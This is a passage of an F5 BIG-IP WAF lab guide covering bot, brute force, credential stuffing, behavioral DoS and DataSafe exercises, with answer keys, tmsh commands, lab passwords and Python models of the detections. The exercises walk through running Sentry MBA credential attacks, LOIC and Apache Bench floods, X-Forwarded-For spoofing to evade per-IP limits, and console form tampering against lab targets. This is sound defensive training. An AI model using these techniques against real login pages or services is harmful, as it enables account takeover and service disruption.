How many requests were denied for failing the CAPTCHA Challenge? _____________

− At the bottom of the page click View Detected Bots.


This page displays all bots that were identified during the time range targeting the selected virtual server.
− Open the Event Logs > DoS > Application Events page.
The first log entry (Source IP-Based Client Side Integrity Defense) identifies when the L7 DoS attack was
identified, and source IP client-side integrity defense began. The second log entry (Source IP-Based Block All) is
when the IP address failed the JavaScript challenge and was considered suspicious and BIG-IP AWAF began to
block all requests from this IP address. You may have a third request identifying the end of the attack.

− Expand one of the attack details.

You can see the source IP address of the attack, which is the IP address that’s being blocked.
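The detection thresholds set in Task 4 (TPS increased by 5% and reached at least 5, OR TPS reached 5) and the two-stage mitigation seen in the Application Events (client-side integrity defense first, Block All once the source keeps failing the challenge past the escalation period) can be modelled as a small per-source-IP state machine. This is an added Python example, not F5 code: the 60-second baseline window, the Jumpbox address 10.1.10.50, the "Attack ended" event and the per-second request counts are constructed.

```python
from collections import deque
from dataclasses import dataclass, field
from typing import Deque, Dict, List, Optional, Tuple

CSI = "Source IP-Based Client Side Integrity Defense"   # first Application Events entry
BLOCK_ALL = "Source IP-Based Block All"                 # second entry
ENDED = "Attack ended"                                  # constructed name for the third


@dataclass
class TpsSettings:
    """Lab values from dvwa_dos_profile; production defaults are much higher."""
    increase_pct: float = 5.0        # TPS increased by 5%
    min_tps_after_increase: int = 5  # ...and reached at least 5
    absolute_tps: int = 5            # OR TPS reached 5
    escalation_seconds: int = 5      # Prevention Duration > Escalation Period
    baseline_seconds: int = 60       # constructed: window used to learn normal TPS


@dataclass
class SourceState:
    history: Deque[int] = field(default_factory=deque)
    mitigation: str = "none"         # none -> csi -> block-all
    since: int = 0


class TpsDetector:
    def __init__(self, settings: Optional[TpsSettings] = None):
        self.s = settings or TpsSettings()
        self.sources: Dict[str, SourceState] = {}
        self.events: List[Tuple[int, str, str]] = []

    def _is_attack(self, st: SourceState, tps: int) -> bool:
        if tps >= self.s.absolute_tps:              # "OR TPS reached"
            return True
        if not st.history:
            return False                            # no baseline yet to compare against
        baseline = sum(st.history) / len(st.history)
        grown = baseline > 0 and tps >= baseline * (1 + self.s.increase_pct / 100)
        return grown and tps >= self.s.min_tps_after_increase

    def observe(self, ip: str, second: int, tps: int, passes_js: bool) -> str:
        """Feed one second of traffic from ip; return forward, challenge or block."""
        st = self.sources.setdefault(ip, SourceState())
        attack = self._is_attack(st, tps)
        if st.mitigation == "none":
            if attack:
                st.mitigation, st.since = "csi", second
                self.events.append((second, ip, CSI))
        elif st.mitigation == "csi":
            if not attack:
                st.mitigation = "none"
                self.events.append((second, ip, ENDED))
            elif not passes_js and second - st.since >= self.s.escalation_seconds:
                st.mitigation, st.since = "block-all", second
                self.events.append((second, ip, BLOCK_ALL))
        elif st.mitigation == "block-all" and not attack:
            st.mitigation = "none"
            self.events.append((second, ip, ENDED))
        # Only forwarded traffic (or a browser that answered the challenge) feeds the
        # baseline, so a flood cannot teach the detector that 200 TPS is normal.
        if st.mitigation == "none" or passes_js:
            st.history.append(tps)
            if len(st.history) > self.s.baseline_seconds:
                st.history.popleft()
        if st.mitigation == "block-all":
            return "block"
        if st.mitigation == "csi":
            return "forward" if passes_js else "challenge"
        return "forward"


def simulate_lab() -> Dict[str, object]:
    """Constructed replay of Task 4: LOIC from the Jumpbox for 30 s (never answers
    the JavaScript challenge) while a real browser on the Traffic Generator browses."""
    det = TpsDetector()
    jumpbox, generator = "10.1.10.50", "10.1.10.51"   # Jumpbox address is constructed
    actions: Dict[str, List[str]] = {jumpbox: [], generator: []}
    for sec in range(31):
        loic_tps = 200 if sec < 30 else 0             # flood stops at second 30
        actions[jumpbox].append(det.observe(jumpbox, sec, loic_tps, passes_js=False))
        actions[generator].append(det.observe(generator, sec, 1, passes_js=True))
    return {"events": det.events, "actions": actions}
```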

PREPARE FOR NEXT EXERCISE


− Close LOIC.
− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
tmsh delete security bot-defense profile dvwa_bot_defense_profile
tmsh delete security dos profile dvwa_dos_profile
tmsh delete security log profile dvwa_log_profile
exit

Question and Answer Key


Task 5 – View Additional Bot Defense and DoS Reports
Q: How many requests matched the Browser Masquerading bot category?
A: Answers will vary, but it should be very high.

Q: How many requests matched the DOS Tool bot category?


A: 1000

Q: How many accepted requests passed the CAPTCHA Challenge?


A: 1

Q: How many requests were denied for failing the CAPTCHA Challenge?
A: 60


ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection


Exercise – Use Distributed Brute Force and Credential Stuffing Protection
• Estimated completion time: 60 minutes.

Task 1 – Run a Brute Force Attack


Use Sentry MBA to launch a brute force attack.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool hackazon_pool members add { 10.1.20.20:80 { address 10.1.20.20 } }
tmsh create ltm virtual hackazon_virtual destination 10.1.10.43:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool hackazon_pool

− From the Exercise_Files directory open wordlist – multiple usernames.


You’ve discovered that a user named Bob Smith uses P@ssw0rd! as his password. This text file contains
thousands of candidate usernames for this person, built from his first, middle, and last name, each paired with
that same password. You’ll use it to brute force the username of this user’s personal account in the
Hackazon web application.
− Close Notepad, and then open Start > Sentry_MBA.
You’ll use this tool to submit the brute force attack against the Hackazon login page.
− On the Lists > Wordlist page under WordList, click the open icon.

− Navigate to the Documents > Exercise Files directory, and then select wordlist – multiple usernames.
− Click Go!!, and then click Start the Bruteforcer Engine!
This tool is used to target login pages with username / password lists and will return successful logins in
the Hits tab.
− Examine the Progress and Wordlist Position.
The brute force continues to progress through the entries in the wordlist.
− Examine the Hits tab.
You successfully found the victim’s username: [email protected].
− Click Abort.
− Open Internet Explorer and click the Hack Login bookmark, and then log in as [email protected] / P@ssw0rd!
− On the Hackazon My Account page click Profile, and then close the Internet Explorer window.
Through this brute force attack you’ve found the user’s personal username. Because the same password is reused,
you could now try this username and password against other web applications, such as online banking,
eCommerce, and social networking sites.

Task 2 – Create a Security Policy and Configure Brute Force Protection


Create a security policy for hackazon_virtual and then add source-based brute force protection.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Rapid Deployment
Virtual Server hackazon_virtual (HTTP)
Enforcement Mode Blocking
Policy Building Learning Mode Automatic
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open the Learning and Blocking Settings page.
− Expand URLs and from the Learn New HTTP URLs list select Always, then click Save, and then click Apply Policy.
− Open a New private window (Firefox) and click the Hack Login bookmark, and then close Firefox.
− In the Configuration Utility open the Policies List page and click hackazon_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode click Disabled, and then click Save.
You used this process to learn about the /user/login URL, which you’ll need when configuring a Login Page
element for brute force protection.
− Open the Application Security > Sessions and Logins > Login Pages List page and click Create.
− For Login URL leave Explicit > HTTP selected, and then in the field start typing /user/login, and then select
the URL once it displays.
− Configure the login page using the following information, and then click Create.
Authentication Type HTML Form
Username Parameter Value username
Password Parameter Value password
A string that should NOT appear in the response incorrect
Expected HTTP response status code 302

− Open the Application Security > Brute Force Attack Prevention page and click Create.
− From the Login Page list select [HTTP]/user/login.
− In the Source-based Brute Force Protection section configure the following:
Username Trigger: Never
IP Address Action: Alarm and Blocking Page

− In the Distributed Brute Force Protection section configure the following:
Detect Distributed Attack Never
Detect Credential Stuffing Never

− Click Create, and then click Apply Policy.


− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
− Examine the Progress and Wordlist Position.
After a couple of seconds the progress and wordlist positions no longer increase.
− Examine the Hits tab.
No username/password combinations are being discovered.

Question:
Why isn’t this brute force attack succeeding? _______________________________________

− After about 45 seconds click Abort and then Stop.


− In the Configuration Utility right-click on Event Log and select Open link in new tab, and then examine
the new tab.
There are thousands of blocked requests.
− Select the most recent blocked log entry and under Occurrences click 1.
BIG-IP ASM brute force protection identified that the login attempts were all coming from the same client IP address
and blocked every request from that address once the threshold of 20 failed logins was reached. At this point the
source-based protection is successfully protecting the Hackazon login page from a brute force attack launched from
a single IP address.
− Select the Select all items checkbox and select Delete Requests > Delete all requests.

Turn the brute force attack into a distributed brute force attack
− Navigate to Local Traffic and right-click on Virtual Servers and select Open link in new tab, then in the new tab
click hackazon_virtual, and then open the Resources page.
− For iRules click Manage, then add brute_sources to the virtual server, and then click Finished.
This iRule inserts a different X-Forwarded-For value into every request, so each request appears to come from a different client address.
− Use this tab to open the Policies List page and click hackazon_security_policy.
− For Trust XFF Header select the Enabled button, then click Save, then click Apply Policy, and then close
the third tab.
With this setting BIG-IP ASM takes the X-Forwarded-For value (inserted by the iRule) as the source IP address of each
incoming request, so the source-based counter now sees a different client for every login attempt. Outside the lab,
trust this header only when the virtual server is reached exclusively through a proxy you control; a client that can
send requests directly to the virtual server can set X-Forwarded-For to any value it likes.
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
− Examine the Progress and Wordlist Position.
The brute force continues to progress through the entries in the wordlist.
− Examine the Hits tab.
You once again discovered the username [email protected].

− Examine the window with the different HTTP response codes.

All requests are returning with HTTP 200 response codes.

Question:
Why is this same brute force attack now succeeding? ________________________________

− Once the username has been discovered click Abort.


− In the Configuration Utility reload the Application > Requests tab.
The distributed brute force attack generated hundreds of requests that the security policy rated legal, from many
different IP addresses in the same region.
− Click the filter icon.

− Select the Method / Protocol / Result tab.


− For Login Result select Successful, then click Apply Filter, and then select a couple of log entries and examine
the Username value.

You can quickly see which usernames were discovered during this distributed brute force attack.
− Click the filter icon, then for Login Result select Failed, then click Apply Filter, and then select a few of the
log entries and examine the Username value.
You can also see how many attempted login requests failed and the usernames that were attempted.
− Select the Select all items checkbox and select Delete Requests > Delete all requests.

Task 3 – Enable Distributed Brute Force Attack Protection


Update the brute force protection to identify and mitigate distributed brute force attacks.

− On the Brute Force Attack Prevention tab click [HTTP] /user/login.


− In the Distributed Brute Force Protection section, for Detect Distributed Attack select the After option,
and use 50 failed login attempts.
− Select the Mitigation list.
For now, you’ll leave the mitigation set to Alarm and CAPTCHA.
− Click Save, and then click Apply Policy.

− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
− Examine the Progress and Wordlist Position.
After about five seconds the Progress and Wordlist Position both stop.
− Examine the Hits tab.
No username/password combinations are being discovered.
− Open a new Firefox window and click the Hack Login bookmark, and then log in
as [email protected] / abc123.
− Enter the CAPTCHA challenge (which is case sensitive), and then click Logout and close the Firefox window.
Valid users can access the web application during a distributed brute force attack.
− On the UDF class portal page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− On the Traffic Generator desktop open Firefox click the Hack Login bookmark, and then log in as admin / admin.
All users are verified using the CAPTCHA challenge during a distributed brute force attack.
− Close the Firefox window without entering the CAPTCHA challenge.
− In Sentry MBA click Abort and then Stop!
− In the Configuration Utility on the Application > Requests tab click the Filter icon, then for Login Request
click Successful, and then click Apply Filter.
There are just a couple of successful login attempts.
− Select the Illegal log entry, and then under Occurrences click 1.

This log entry was generated when you entered the correct CAPTCHA challenge.
− Click the Filter icon, then for Login Request click Failed, and then click Apply Filter.
These are the log entries that were generated before the CAPTCHA challenge mitigation began.
− Click the Filter icon, then click Failed to clear this button, then select the Basic tab, then for Request Status
click Challenged, and then click Apply Filter.
There are thousands of requests from Sentry MBA that were sent the CAPTCHA challenge but failed to submit
a challenge response.
− On the Brute Force Attack Prevention tab click [HTTP]/user/login.
− In the Distributed Brute Force Protection section, for Mitigation select Alarm and Client Side Integrity,
then click Save, and then click Apply Policy.
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
After about five seconds the progress and wordlist positions stop.

− Examine the window with the different HTTP response codes.
After a few seconds, requests are returning with HTTP 421 response codes.
− Open a new Firefox window and click the Hack Login bookmark, and then log in
as [email protected] / abc123. Once the My Account page displays, click Logout, and then close
the Firefox window.
Notice that it takes a couple of seconds for the next page to load, because the browser is being challenged by BIG-IP AWAF.
Firefox executes the JavaScript and passes the challenge transparently; Sentry MBA does not, which is why its progress stalled.
− In the Configuration Utility, use the Brute Force Attack Prevention tab to open the Security > Event Logs >
Application > Brute Force Attacks page.
This page contains extensive details about the distributed brute force attack, including the attack type,
the number of detected failed logins, the number of detected login attempts, and the mitigation method.
− View the Login Stress details.
Login Stress is a health measure derived from the current number of failed logins relative to the detection threshold.
A value of 100% means that the login URL is under attack.
− Select the ongoing attack, and then examine the Attack Summary tab.

Questions:
How many detected login attempts were there? _____________

How many client side integrity challenges were there? _____________

− In Sentry MBA click Abort and then Stop!, and then close Sentry MBA.

Task 4 – Enable Credential Stuffing Detection


Add credential stuffing detection to the /user/login page.

− In the Brute Force Attack Prevention tab click [HTTP] /user/login.


− For Detect Distributed Attack select the Never option and click Save, and then click Apply Policy.
− From the Exercise Files directory open wordlist – leaked credentials.
This is a list of known leaked usernames and passwords that was purchased from a malicious user. You’re going to
identify whether any of these leaked credentials can be used on the Hackazon web application.
− Close Notepad, then open Sentry MBA, and then open Wordlist.
− Click the icon to clear the current wordlist.

− Click the open icon, and then select wordlist – leaked credentials.
− Click Go!!, then select the Use the Progression Position (1) checkbox, then click Start the Bruteforcer Engine!

− Let the attack run for several seconds and examine the Hits tab.
Several leaked username/password combinations are found as successful for the Hackazon web application.

− After there are 9 found username/password combinations click Abort.


− Notice there is a found username/password combo for [email protected]:admin.
− Open a new Firefox window and click the Hack Login bookmark, and then log in
as [email protected] / admin.
− On the Hackazon My Account page click Profile.
Through the credential stuffing attack you’ve discovered users who reuse on this application the same credentials that
were leaked from another site, including an administrator’s credentials.
− Click Logout, and then close the Firefox window.
− In the Configuration Utility, on the Brute Force Attack Prevention tab click [HTTP] /user/login.
− In the Distributed Brute Force Protection section, for Detect Credential Stuffing select the After option, and
then use 40 login attempts that match known leaked credentials dictionary.
− Click Save, then click Apply Policy, and then close the tab.
− In Sentry MBA click Go!!, then select the Reset WordList Position checkbox, and then
click Start the Bruteforcer Engine!
One username/password combination is identified, but none after that. Remember that you configured the protection
to start after 40 login attempts that match the leaked credentials dictionary; the one success got through before
that threshold was reached.
− After about 30 seconds, in the Configuration Utility reload the Brute Force Attacks page.

Notice the new ongoing attack is listed as Credentials Stuffing.


− Close Sentry MBA.
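The three detections configured in Tasks 2 to 4, and the reason the X-Forwarded-For trick in Task 2 defeats only the source-based one, can be seen in a small Python model. This is added example code, not BIG-IP ASM’s implementation or any code from this lab: the thresholds are the lab settings (20 failed logins per source IP, a distributed attack after 50 failed logins on the login URL, credential stuffing after 40 attempts matching a leaked credentials dictionary), the IP addresses and credential lists are constructed, and ASM’s detection windows, Login Stress calculation and mitigations are deliberately left out.

```python
"""Simplified model of the brute force detections configured in this lesson.

Added example, not BIG-IP ASM's code. Thresholds mirror the lab settings; the
IP addresses, usernames and "leaked" credentials below are constructed.
"""
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

LOGIN_URL = "/user/login"


@dataclass
class LoginAttempt:
    client_ip: str        # TCP source address as seen by the virtual server
    headers: dict         # request headers, e.g. {"X-Forwarded-For": "..."}
    url: str
    username: str
    password: str
    success: bool         # True when the backend answered with the expected 302


@dataclass
class BruteForceConfig:
    trust_xff: bool = False                      # policy setting "Trust XFF Header"
    ip_failed_threshold: Optional[int] = 20      # source-based: IP Address Action after N failures
    distributed_threshold: Optional[int] = 50    # Detect Distributed Attack: After N failed logins
    stuffing_threshold: Optional[int] = 40       # Detect Credential Stuffing: After N dictionary matches
    leaked_credentials: set = field(default_factory=set)   # "username:password" strings


class BruteForceDetector:
    def __init__(self, cfg: BruteForceConfig):
        self.cfg = cfg
        self.failed_by_source = Counter()   # source-based counter, keyed by effective client IP
        self.failed_on_url = 0              # distributed counter: one per login URL, any source
        self.dictionary_matches = 0         # credential stuffing counter

    def effective_source(self, attempt: LoginAttempt) -> str:
        """With Trust XFF enabled, the left-most X-Forwarded-For address replaces the
        TCP source. This is what lets the brute_sources iRule defeat source-based protection."""
        xff = attempt.headers.get("X-Forwarded-For")
        if self.cfg.trust_xff and xff:
            return xff.split(",")[0].strip()
        return attempt.client_ip

    def process(self, attempt: LoginAttempt) -> list:
        """Feed one login attempt; return the names of the detections it triggers."""
        if attempt.url != LOGIN_URL:
            return []
        cfg, hits = self.cfg, []
        if f"{attempt.username}:{attempt.password}" in cfg.leaked_credentials:
            self.dictionary_matches += 1
            if cfg.stuffing_threshold and self.dictionary_matches >= cfg.stuffing_threshold:
                hits.append("credential_stuffing")
        if not attempt.success:
            src = self.effective_source(attempt)
            self.failed_by_source[src] += 1
            self.failed_on_url += 1
            if cfg.ip_failed_threshold and self.failed_by_source[src] >= cfg.ip_failed_threshold:
                hits.append("source_based")
            if cfg.distributed_threshold and self.failed_on_url >= cfg.distributed_threshold:
                hits.append("distributed")
        return hits


def first_detections(cfg: BruteForceConfig, attempts) -> dict:
    """Run attempts in order; map each detection to the 1-based attempt that first raised it."""
    det, first = BruteForceDetector(cfg), {}
    for n, attempt in enumerate(attempts, 1):
        for hit in det.process(attempt):
            first.setdefault(hit, n)
    return first


# --- constructed traffic resembling the Sentry MBA runs in Tasks 2 to 4 ------------

def single_source_attempts(n=100):
    """Task 2, first run: one client tries many usernames with one password."""
    return [LoginAttempt("10.1.10.199", {}, LOGIN_URL, f"bob.smith{i}", "P@ssw0rd!", False)
            for i in range(n)]


def spoofed_source_attempts(n=100):
    """Task 2, after the iRule: same TCP source, a different X-Forwarded-For on every request."""
    return [LoginAttempt("10.1.10.199", {"X-Forwarded-For": f"198.51.100.{i % 254 + 1}"},
                         LOGIN_URL, f"bob.smith{i}", "P@ssw0rd!", False)
            for i in range(n)]


def leaked_dictionary(n=200):
    return {f"user{i}@example.com:leaked{i}" for i in range(n)}


def stuffing_attempts(dictionary, valid_here):
    """Task 4: replay leaked pairs from rotating sources; a few happen to be valid on this site."""
    return [LoginAttempt("10.1.10.199", {"X-Forwarded-For": f"203.0.113.{i % 254 + 1}"},
                         LOGIN_URL, *cred.split(":", 1), cred in valid_here)
            for i, cred in enumerate(sorted(dictionary))]


if __name__ == "__main__":
    print(first_detections(BruteForceConfig(distributed_threshold=None), single_source_attempts()))
    print(first_detections(BruteForceConfig(trust_xff=True, distributed_threshold=None), spoofed_source_attempts()))
    print(first_detections(BruteForceConfig(trust_xff=True), spoofed_source_attempts()))
```

Run stand-alone, the first line reports the source-based detection on attempt 20, the second reports nothing at all (every spoofed request is a new source and the distributed detector is set to Never, as in Task 2), and the third reports the distributed detection on attempt 50 once it is enabled, as in Task 3.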

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual hackazon_virtual
tmsh delete ltm pool hackazon_pool
tmsh delete ltm node 10.1.20.20
tmsh delete ltm policy asm_auto_l7_policy__hackazon_virtual
tmsh delete asm policy hackazon_security_policy
exit

Question and Answer Key


Task 2 – Create a Security Policy and Configure Brute Force Protection
Q: Why isn’t this brute force attack succeeding?
A: The requests were blocked by the source-based IP address brute force mitigation (Alarm and
Blocking Page).

Q: Why is this same brute force attack now succeeding?


A: The requests are no longer coming from the same source IP address.

Task 3 – Enable Distributed Brute Force Attack Protection


Q: How many detected login attempts were there?
A: Answers will vary, but it should be several thousand.

Q: How many client side integrity challenges were there?


A: Answers will vary, but it should be several thousand.

ASM Lesson 14 – Behavioral DoS Protection

Exercise – Use Behavioral DoS Protection


• Estimated completion time: 60 minutes.

Task 1 – Create a Security Policy and a DoS Protection Profile


Create a security policy for test_site_virtual, and then configure a DoS protection profile for test_site_virtual using
behavioral DoS detection and mitigation.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− If necessary, update the Windows time:
o Select the clock and click Date and time settings.
o Click Sync now, and then close the Date & time dialog box.
− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool test_site_pool members add { 10.1.20.11:80 { address 10.1.20.11 } }
tmsh create ltm profile http http_profile insert-xforwarded-for enabled
tmsh create ltm virtual test_site_virtual destination 10.1.10.20:80 ip-protocol tcp profiles add { tcp { } http_profile { } } rules { random_ip_addresses } security-log-profiles add { "Log all requests" } pool test_site_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name test_site_security_policy
Policy Template Rapid Deployment
Virtual Server test_site_virtual (HTTP)

→NOTE: A BIG-IP ASM security policy isn’t required to use an L7 DoS protection profile. You’re adding this so that
you can view request details using the BIG-IP ASM event log.

− Once the policy is created click test_site_security_policy, then for Trust XFF Header select the Enabled button,
then click Save, and then click Apply Policy.
The test_site_virtual uses an iRule to simulate good and bad traffic from a few specific geolocations.
− Open the Security > DoS Protection > Protection Profiles and click Create.
− Name the new profile test_site_dos_profile. (NOTE: For this exercise to work as written, you MUST enter this
exact name for the DoS profile.)
− Under Application Security click Behavioral & Stress-based Detection.
− For Behavioral Detection and Mitigation click Edit.
Note that the Bad actors behavior detection and Request signatures detection checkboxes are already selected.
You’ll also leave the Mitigation set to Standard protection.
− Click Finished.
− Open the Virtual Server List page and click test_site_virtual, and then open the Security > Policies page.

− From the DoS Protection Profile list select Enabled, then for Profile select test_site_dos_profile, and then
click Update.
− Resize the PuTTY window by making it wider.
− In PuTTY copy and paste the following command.
admd -s vs./Common/test_site_virtual+/Common/test_site_dos_profile.info.learning

This command displays the traffic learning progress. Currently all four values are 0 because there is no traffic
arriving at the BIG-IP system.

Task 2 – Generate a Baseline


Use a script to generate valid traffic to test_site_virtual.

− On the UDF class portal page, for the Traffic Generator image click Console, and then log in
as f5 student / admin.F5demo.com
− From the bottom of the page open a Terminal window, and then at the prompt type the following
(type 2 when prompted):
./baseline_menu.sh

This script makes several requests to 10.1.10.20 (test_site_virtual) for different URLs, using different
web browsers, and from different client IP addresses. This will be used to establish the baseline.
Note that the status response for each request is 200.
− In the Configuration Utility open the Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
There are hundreds of legal requests from several geolocations (United States, United Kingdom, Brazil,
Australia, and Singapore).
− Navigate to Security > DoS Protection and right-click on Signatures, then select Open link in new tab, and then in
the new tab click Dynamic to view any dynamic signatures.
There are currently no dynamic signatures.
− Examine the PuTTY window.
You can use these details to ensure that BIG-IP AWAF has accumulated enough baseline learning details.
The command’s output is 4 comma-separated values that show the learning progress:
o 1st value: How confident BADOS is in the baseline learning. This should be over 80%.
o 2nd value: The number of learned bins. This should be > 0.
o 3rd value: The number of learned requests. This should be > 2000.
o 4th value: How confident, as a percentage, BIG-IP AWAF is in the good table. It must be 100% for behavioral
signatures to work.

→NOTE: It will take several minutes to fully create the baseline. Perhaps use this time to use the restroom or get a
beverage.

→NOTE: Do not move on until the first value is over 80%, the third value is over 2000, and the fourth value
is 100%. In the Event Log, it will take approximately 7000 requests before you’ll see these values.

− In the Configuration Utility, on the Application > Requests tab select the Select all items checkbox, and then
select Delete Requests > Delete all requests.

Task 3 – Simulate a Layer 7 DoS Attack


Simulate a layer 7 DoS attack targeting test_site_virtual.

− In the Traffic Generator window open a second Terminal window and type the following (type 2 when prompted):
./AB_DOS.sh

This script uses Apache Bench and targets 10.1.10.20 (test_site_virtual). Notice that the first script stops.
− In the Configuration Utility reload the Application > Requests page.
There are now requests from Syria, North Korea, and Congo.
− Let the attack run for about 30 seconds.
− On the Signatures tab reload the page, and then click Dynamic. Continue to do this until you see one or more
dynamic signatures listed.

Note that the current Approval State is Unapproved.


− For each listed dynamic signature click its Name, then on the left side of the page select
the Approved checkbox, then click Update, and then close the tab.
− Continue to let the attack run for about 3 minutes before moving on.
− In the Traffic Generator window type Ctrl+C to stop the baseline generator.
− Type Ctrl+C and then 4 and then Enter to stop the attack.
− In the Configuration Utility, on the Application > Requests tab select the Select all items checkbox, and then
select Delete Request > Delete all requests.
− In the Traffic Generator window use the second Terminal window to start the attack again.
(Type 2 when prompted.)
− In the Configuration Utility reload the Application > Requests tab.
There are no new log entries, as all requests are being blocked by BIG-IP AWAF’s DoS protection using the
dynamic signature(s).
− Let the attack run for a couple minutes. Use this time to use the restroom or get a beverage.

− After the attack has run for a few minutes, navigate to Reporting > DoS and right-click on Analysis, then
select Open link in new tab, and then in the new tab adjust the time frame to view about the past 15 minutes.

− Collapse the BIG-IP Health, Virtual Servers, and Attacks sections, and then in the HTTP section view the
Transactions Outcomes (Avg TPS) chart.

Most requests are blocked due to Blocked Bad Request (dynamic signature matching) and Blocked Bad Actor.
− Resize the widget column by making it wider.

− Scroll down and expand the Transaction Outcomes widget.

→NOTE: Be sure to use the “inner” scroll bar.

You can view more details about the number of requests that were blocked due to matching a dynamic signature
(Blocked Bad Request) or matching the source IP address of a known bad actor (Blocked Bad Actor).
− Scroll down and expand and then view the Behavioral Signatures widget.
You can view how many requests were blocked due to matching the new dynamic signatures.
− Reload the Application > Requests tab.
No layer 7 DoS attack traffic was processed by the BIG-IP ASM security policy and sent to the pool members.
− In the Traffic Generator window start the baseline generator again (type 2 when prompted).
− In the Configuration Utility reload the Application > Requests tab.
Valid user traffic is still processed by the BIG-IP ASM security policy and forwarded to the pool members.

− In the DoS Analysis tab open the Reporting > DoS > Dashboard page, and then resize the widget column by making
it narrower.
− View the DoS attack details in the Attacks section.
− Use the icon on the top-right side of the table to hide the Vector, Virtual Server, Start Time, and End Time
columns.

Questions:
What type of mitigation was used in this DoS attack? ____________________________

How many DoS attack transactions were blocked? ________________________

− Close the tab.


− In the Traffic Generator window type Ctrl+C to stop the baseline generator.
− Type Ctrl+C and then 4 and then Enter to stop the attack.

PREPARE FOR NEXT EXERCISE


− In PuTTY, type Ctrl+C to stop the previous command, and then copy and paste the following TMSH commands.
tmsh delete ltm virtual test_site_virtual
tmsh delete ltm pool test_site_pool
tmsh delete ltm node 10.1.20.11
tmsh delete ltm profile http http_profile
tmsh delete ltm policy asm_auto_l7_policy__test_site_virtual
tmsh delete asm policy test_site_security_policy
tmsh delete security dos profile test_site_dos_profile
exit

Question and Answer Key


Task 3 – Simulate a Layer 7 DoS Attack
Q: What type of mitigation was used in this DoS attack?
A: Behavioral Mitigation

Q: How many DoS attack transactions were blocked?


A: Answers will vary, but the number of transactions should be well over 500K.

ASM Lesson 15 – DataSafe

Exercise – Use DataSafe Protection


• Estimated completion time: 45 minutes.

Task 1 – View How Malware Can Steal Confidential Data


Use the Chrome developer tools to examine how malware can steal confidential data such as usernames
and passwords.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } pool dvwa_pool

− Open Chrome and press the F12 key, then click the DVWA bookmark, and then enter the credentials
victim / P@ssw0rd! but do not click Login.
− In the inspection window on the Console tab type (or copy and paste) the following and press Enter.
document.forms[0]

− Place your mouse over the form element, and then examine the web page.

This is the form where the user credential fields are displayed.
− In the console, one at a time type (or copy and paste) each of the following lines and press Enter after each.
document.forms[0].username.value
document.forms[0].password.value

These values haven’t been submitted yet, but they are already available in cleartext to any script running in the page, which is all that form-grabbing malware needs.
− In the console type (or copy and paste) the following and press Enter after each.
document.forms[0].username.value = "admin"
document.forms[0].password.value = "password"

− Examine the web page form.


Malware can manipulate parameter values before they are submitted.
− Click Login to use these modified credentials.
− In the inspection window select the Network tab and click login.php, and then view the bottom of
the Headers tab.

Both the username and the password were successfully modified and used to log in to the web application, and both
are displayed in cleartext in the request body. Both fields are currently exposed to a malware script.

− Examine the name values for both user-input fields in the form.

We need to protect two parameters: the username and password parameters on the /login.php URL.

Task 2 – Enable DataSafe Protection


Add BIG-IP DataSafe protection to the /login.php page.

− Open a new Chrome window and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security > Data Protection > BIG-IP DataSafe page and click Create.
− For Profile Name enter dvwa_datasafe_profile.
− Open the URL List page, and then click Add URL.

− For URL Path leave Explicit selected and enter /login.php.


− From the left menu open the Application Layer Encryption page.
− Leave the Identify Stolen Credentials and Advanced > Hide Password Revealer Icon checkboxes selected
and clear all other configuration checkboxes.
− From the left menu open the Parameters page, and then click Add.
− For Parameter Name leave Explicit selected and enter username.
− Select the Application Layer Encryption > Encrypt checkbox, and then click Repeat.
− For Parameter Name leave Explicit selected and enter password.
− Select the Application Layer Encryption > Encrypt checkbox, and then click Create.

− Click Save.
− Navigate to Local Traffic and right-click on Virtual Servers, then select Open in a new tab, then in the new tab
click dvwa_virtual, and then open the Security > Policies page.
− From the DataSafe Profile list select Enabled, then for Profile select dvwa_datasafe_profile,
then click Update, and then close the second tab.
− In the DVWA page click Logout, and then enter the credentials victim / P@ssw0rd! but do not click Login.
− Open the Console tab and repeat the following and press Enter (type the ↑ key on your keyboard):
document.forms[0].password.value;

Question:
Is the password value now safe from malware prior to submitting the form? _______________

− Click Login, then in the inspection window select the Network tab and click login.php, and then view the bottom of
